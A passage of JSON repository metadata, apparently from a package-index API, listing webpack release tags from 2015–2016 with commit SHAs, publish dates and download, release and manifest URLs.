43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"